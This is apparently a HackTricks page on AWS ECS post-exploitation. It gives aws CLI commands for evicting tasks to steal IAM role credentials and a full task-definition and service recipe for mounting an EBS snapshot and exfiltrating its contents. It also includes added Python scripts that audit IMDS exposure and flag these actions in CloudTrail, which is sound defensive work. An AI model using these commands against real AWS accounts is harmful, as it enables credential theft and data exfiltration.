AWS - ECS Post Exploitation

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

ECS

For more information check:

AWS - ECS Enum

Host IAM Roles

In ECS, an IAM role can be attached to the task running inside the container. If the task is run inside an EC2 instance, the EC2 instance will have another IAM role attached to it.
This means that if you manage to compromise an ECS instance you could potentially obtain the IAM role associated with the ECR and with the EC2 instance. For more information about how to obtain those credentials check:

Cloud SSRF - HackTricks

Caution

IMDSv2 with a hop limit of 1 does not block awsvpc or host-networked tasks—only Docker bridge tasks sit far enough away for the responses to die. See ECS-on-EC2 IMDS Abuse & ECS Agent Impersonation for the full attack workflow and bypass notes. Recent Latacora research shows that awsvpc and host tasks still fetch host credentials even when IMDSv2+h=1 is enforced.
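The caveat above is easy to get wrong in an audit, because "IMDSv2 required, hop limit 1" looks hardened but only protects bridge-mode tasks. The following Python helper is an added example (not part of the HackTricks page or any AWS tool) that encodes the rules stated above: host-mode tasks share the instance's network namespace, awsvpc-mode tasks are unaffected by the hop limit, and bridge-mode tasks are only cut off for IMDSv2 responses. The mitigations it checks, `ECS_AWSVPC_BLOCK_IMDS=true` in `/etc/ecs/ecs.config` for awsvpc tasks and a `DOCKER-USER` iptables DROP for 169.254.169.254 for bridge tasks, are AWS-documented agent and host controls; the instance settings and ecs.config text are constructed inline (in practice they come from `ec2 describe-instances` MetadataOptions and the node's ecs.config).

```python
from dataclasses import dataclass, field


def parse_ecs_config(text: str) -> dict:
    """Parse the KEY=VALUE lines of /etc/ecs/ecs.config; blank lines and comments are skipped."""
    cfg = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        cfg[key.strip()] = value.strip()
    return cfg


@dataclass
class ContainerInstance:
    """The subset of an ECS container instance's settings that decides IMDS exposure."""
    http_tokens: str                      # MetadataOptions.HttpTokens: "required" (IMDSv2 only) or "optional"
    hop_limit: int                        # MetadataOptions.HttpPutResponseHopLimit
    agent_config: dict = field(default_factory=dict)   # parsed /etc/ecs/ecs.config
    docker_user_imds_drop: bool = False   # DOCKER-USER iptables rule dropping 169.254.169.254 from docker+ interfaces


def imds_reachable(inst: ContainerInstance, network_mode: str) -> tuple:
    """Return (reachable, reason) for a task with the given network mode on this instance."""
    if network_mode == "host":
        # The task shares the host network namespace: it is the host as far as IMDS is concerned.
        return True, "host network mode: IMDS settings cannot separate the task from the instance"
    if network_mode == "awsvpc":
        # Traffic leaves through the task ENI, not the docker bridge, so the hop limit never bites.
        if inst.agent_config.get("ECS_AWSVPC_BLOCK_IMDS", "false").lower() == "true":
            return False, "ECS_AWSVPC_BLOCK_IMDS=true blocks IMDS for awsvpc tasks"
        return True, "awsvpc task: hop limit does not apply and ECS_AWSVPC_BLOCK_IMDS is not set"
    if network_mode == "bridge":
        if inst.docker_user_imds_drop:
            return False, "DOCKER-USER rule drops container traffic to 169.254.169.254"
        if inst.http_tokens != "required":
            # The hop limit only applies to the IMDSv2 PUT (token) response; IMDSv1 GETs are unaffected.
            return True, "IMDSv1 still allowed (HttpTokens=optional); the hop limit is irrelevant to it"
        if inst.hop_limit <= 1:
            return False, "IMDSv2 only and hop limit 1: token responses expire at the docker bridge"
        return True, f"IMDSv2 token responses survive the bridge with hop limit {inst.hop_limit}"
    raise ValueError(f"unsupported network mode: {network_mode!r}")


def audit(inst: ContainerInstance, modes=("bridge", "awsvpc", "host")) -> dict:
    """Map each task network mode to whether a task on this instance can reach the host IMDS."""
    return {mode: imds_reachable(inst, mode)[0] for mode in modes}


# Constructed sample: an instance "hardened" only by IMDSv2 + hop limit 1, as in the caveat above.
SAMPLE_ECS_CONFIG = """
ECS_CLUSTER=prod
ECS_ENABLE_TASK_IAM_ROLE=true
# ECS_AWSVPC_BLOCK_IMDS=true   <- commented out, so awsvpc tasks are NOT protected
"""
hardened_only_by_hop_limit = ContainerInstance(
    http_tokens="required", hop_limit=1, agent_config=parse_ecs_config(SAMPLE_ECS_CONFIG))

if __name__ == "__main__":
    for mode in ("bridge", "awsvpc", "host"):
        reachable, why = imds_reachable(hardened_only_by_hop_limit, mode)
        print(f"{mode:7s} reachable={reachable}  {why}")
```

Running the sample reports bridge tasks as blocked but awsvpc and host tasks as still able to fetch the instance-profile credentials, which is exactly the gap the research above describes; setting `ECS_AWSVPC_BLOCK_IMDS=true` closes the awsvpc case, while host-mode tasks can only be addressed by not using host mode or by minimising the instance role.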

Privesc to node to steal other containers creds & secrets

Moreover, EC2 uses docker to run ECS tasks, so if you can escape to the node or access the docker socket, you can check which other containers are running, and even get inside them and steal their attached IAM roles.

Making containers run in current host

Moreover, the EC2 instance role will usually have enough permissions to update the container instance state of the EC2 instances being used as nodes inside the cluster. An attacker could change the state of an instance to DRAINING; ECS will then remove all the tasks from it, and the ones running as REPLICA will be run on a different instance, potentially inside the attacker's instance, so he can steal their IAM roles and any sensitive information inside the container.

aws ecs update-container-instances-state \
--cluster <cluster> --status DRAINING --container-instances <container-instance-id>

The same technique can be performed by deregistering the EC2 instance from the cluster. This is potentially less stealthy, but it will force the tasks to be executed on other instances:

aws ecs deregister-container-instance \
--cluster <cluster> --container-instance <container-instance-id> --force

A final technique to force the re-execution of tasks is to indicate to ECS that the task or container was stopped. There are 3 potential APIs to do this:

# Needs: ecs:SubmitTaskStateChange
aws ecs submit-task-state-change --cluster <value> \
--status STOPPED --reason "anything" --containers [...]

# Needs: ecs:SubmitContainerStateChange
aws ecs submit-container-state-change ...

# Needs: ecs:SubmitAttachmentStateChanges
aws ecs submit-attachment-state-changes ...

Steal sensitive info from ECR containers

The EC2 instance will probably also have the permission ecr:GetAuthorizationToken allowing it to download images (you could search for sensitive info in them).

Mount an EBS snapshot directly in an ECS task (configuredAtLaunch + volumeConfigurations)

Use the native ECS EBS integration (2024+) to attach the contents of an existing EBS snapshot directly to a new ECS task/service and read its data from inside the container.

  • Requirements (minimum):
    • ecs:RegisterTaskDefinition
    • One of: ecs:RunTask OR ecs:CreateService/ecs:UpdateService
    • iam:PassRole on:
      • The ECS infrastructure role used for volumes (policy: service-role/AmazonECSInfrastructureRolePolicyForVolumes)
      • The task execution/task roles referenced by the task definition
    • If the snapshot is encrypted with a CMK: KMS permissions for the infra role (the AWS managed policy above includes the required KMS grants for AWS managed keys).
  • Impact: read any disk contents from the snapshot (e.g., database files) inside the container and exfiltrate them via network/logs.

Steps (Fargate example):

  1. Create the ECS infrastructure role (if it doesn't exist) and attach the managed policy:

aws iam create-role --role-name ecsInfrastructureRole \
  --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsInfrastructureRole \
  --policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSInfrastructureRolePolicyForVolumes

  2. Register a task definition with a volume marked configuredAtLaunch and mount it in the container. Example (prints the secret, then sleeps):

{
  "family": "ht-ebs-read",
  "networkMode": "awsvpc",
  "requiresCompatibilities": ["FARGATE"],
  "cpu": "256",
  "memory": "512",
  "executionRoleArn": "arn:aws:iam::<ACCOUNT_ID>:role/ecsTaskExecutionRole",
  "containerDefinitions": [
    {
      "name": "reader",
      "image": "public.ecr.aws/amazonlinux/amazonlinux:latest",
      "entryPoint": ["/bin/sh", "-c"],
      "command": ["cat /loot/secret.txt || true; sleep 3600"],
      "logConfiguration": {
        "logDriver": "awslogs",
        "options": {"awslogs-region": "us-east-1", "awslogs-group": "/ht/ecs/ebs", "awslogs-stream-prefix": "reader"}
      },
      "mountPoints": [{"sourceVolume": "loot", "containerPath": "/loot", "readOnly": true}]
    }
  ],
  "volumes": [{"name": "loot", "configuredAtLaunch": true}]
}

  3. Create or update a service, passing the EBS snapshot via volumeConfigurations.managedEBSVolume (requires iam:PassRole on the infra role). Example:

{
  "cluster": "ht-ecs-ebs",
  "serviceName": "ht-ebs-svc",
  "taskDefinition": "ht-ebs-read",
  "desiredCount": 1,
  "launchType": "FARGATE",
  "networkConfiguration": {
    "awsvpcConfiguration": {"assignPublicIp": "ENABLED", "subnets": ["subnet-xxxxxxxx"], "securityGroups": ["sg-xxxxxxxx"]}
  },
  "volumeConfigurations": [
    {
      "name": "loot",
      "managedEBSVolume": {
        "roleArn": "arn:aws:iam::<ACCOUNT_ID>:role/ecsInfrastructureRole",
        "snapshotId": "snap-xxxxxxxx",
        "filesystemType": "ext4"
      }
    }
  ]
}

  4. When the task starts, the container can read the snapshot contents at the configured mount path (e.g., /loot). Exfiltrate via the task's network/logs.

Cleanup:

aws ecs update-service --cluster ht-ecs-ebs --service ht-ebs-svc --desired-count 0
aws ecs delete-service --cluster ht-ecs-ebs --service ht-ebs-svc --force
aws ecs deregister-task-definition ht-ebs-read
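Both the task-eviction APIs described earlier (UpdateContainerInstancesState with DRAINING, DeregisterContainerInstance with --force, and the Submit*StateChange calls) and the snapshot mount via volumeConfigurations.managedEBSVolume are recorded as CloudTrail management events, which gives defenders a concrete place to look. The Python triage script below is an added example, not part of the HackTricks page or of any AWS tooling. It runs over constructed CloudTrail-style records embedded inline; the requestParameters field names follow the ECS API request shape that CloudTrail mirrors. One rule rests on an assumption worth tuning: the Submit*StateChange APIs are normally only called by the ECS agent itself, so the script treats a CLI user agent on those calls as the tell, and the agent user-agent string in the sample is a constructed value.

```python
import json

SUBMIT_APIS = {"SubmitTaskStateChange", "SubmitContainerStateChange", "SubmitAttachmentStateChanges"}
SNAPSHOT_APIS = {"CreateService", "UpdateService", "RunTask"}   # all accept volumeConfigurations

# Constructed CloudTrail-style records (not real events). Account id, instance id,
# snapshot id and the agent user agent are placeholders.
SAMPLE_EVENTS = [
    {"eventTime": "2024-06-01T10:00:00Z", "eventName": "UpdateContainerInstancesState",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/ecsInstanceRole/i-0abc"},
     "userAgent": "aws-cli/2.15.0",
     "requestParameters": {"cluster": "prod", "status": "DRAINING",
                           "containerInstances": ["arn:aws:ecs:us-east-1:111111111111:container-instance/prod/aaaa"]}},
    {"eventTime": "2024-06-01T10:01:00Z", "eventName": "DeregisterContainerInstance",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/ecsInstanceRole/i-0abc"},
     "userAgent": "aws-cli/2.15.0",
     "requestParameters": {"cluster": "prod", "containerInstance": "aaaa", "force": True}},
    {"eventTime": "2024-06-01T10:02:00Z", "eventName": "SubmitTaskStateChange",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/ecsInstanceRole/i-0abc"},
     "userAgent": "aws-cli/2.15.0",
     "requestParameters": {"cluster": "prod", "status": "STOPPED", "reason": "anything"}},
    {"eventTime": "2024-06-01T10:02:30Z", "eventName": "SubmitTaskStateChange",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/ecsInstanceRole/i-0abc"},
     "userAgent": "amazon-ecs-agent/1.80.0 (constructed)",   # the agent's normal status reporting
     "requestParameters": {"cluster": "prod", "status": "RUNNING"}},
    {"eventTime": "2024-06-01T10:59:00Z", "eventName": "RegisterTaskDefinition",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "userAgent": "aws-cli/2.15.0",
     "requestParameters": {"family": "ht-ebs-read", "volumes": [{"name": "loot", "configuredAtLaunch": True}]}},
    {"eventTime": "2024-06-01T11:00:00Z", "eventName": "CreateService",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "userAgent": "aws-cli/2.15.0",
     "requestParameters": {"cluster": "ht-ecs-ebs", "serviceName": "ht-ebs-svc",
                           "volumeConfigurations": [{"name": "loot", "managedEBSVolume": {
                               "roleArn": "arn:aws:iam::111111111111:role/ecsInfrastructureRole",
                               "snapshotId": "snap-0123456789abcdef0", "filesystemType": "ext4"}}]}},
    {"eventTime": "2024-06-01T12:00:00Z", "eventName": "UpdateService",       # benign scale-out, no finding
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "userAgent": "aws-cli/2.15.0",
     "requestParameters": {"cluster": "prod", "service": "web", "desiredCount": 3}},
]


def triage_event(ev: dict) -> list:
    """Return a list of findings (possibly empty) for one CloudTrail record."""
    name = ev.get("eventName", "")
    rp = ev.get("requestParameters") or {}
    ua = ev.get("userAgent", "")
    who = (ev.get("userIdentity") or {}).get("arn", "?")
    hits = []

    def add(severity, detail):
        hits.append({"severity": severity, "eventName": name, "principal": who,
                     "time": ev.get("eventTime"), "detail": detail})

    if name == "UpdateContainerInstancesState" and rp.get("status") == "DRAINING":
        # Draining evicts every task so they are re-placed elsewhere.
        add("high", f"drained {rp.get('containerInstances')} in cluster {rp.get('cluster')}")
    elif name == "DeregisterContainerInstance" and rp.get("force"):
        add("high", f"forced deregistration of {rp.get('containerInstance')}")
    elif name in SUBMIT_APIS and ua.startswith("aws-cli"):
        # Heuristic: the ECS agent reports task/container state, a human with a CLI does not.
        add("high", f"{name} from a CLI ({ua}); only the ECS agent should report state")
    elif name in SNAPSHOT_APIS:
        for vc in rp.get("volumeConfigurations") or []:
            ebs = vc.get("managedEBSVolume") or {}
            if ebs.get("snapshotId"):
                add("high", f"volume {vc.get('name')} created from {ebs['snapshotId']} via {ebs.get('roleArn')}")
    elif name == "RegisterTaskDefinition":
        # A configuredAtLaunch volume is the prerequisite for the snapshot mount; low on its own.
        if any(v.get("configuredAtLaunch") for v in rp.get("volumes") or []):
            add("low", f"task definition {rp.get('family')} declares a configuredAtLaunch volume")
    return hits


def triage_records(records) -> list:
    return [hit for ev in records for hit in triage_event(ev)]


def triage_log(text: str) -> list:
    """Accept a CloudTrail log file body ({"Records": [...]}) or a bare JSON list of records."""
    data = json.loads(text)
    records = data.get("Records", []) if isinstance(data, dict) else data
    return triage_records(records)


if __name__ == "__main__":
    for hit in triage_records(SAMPLE_EVENTS):
        print(f"[{hit['severity']}] {hit['time']} {hit['eventName']} by {hit['principal']}: {hit['detail']}")
```

The snapshot rule is the one most worth keeping as a standing alert: legitimate services rarely boot from a snapshot, and the roleArn in the finding tells you which infrastructure role was passed, so it pairs well with an IAM review of who holds iam:PassRole on that role.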
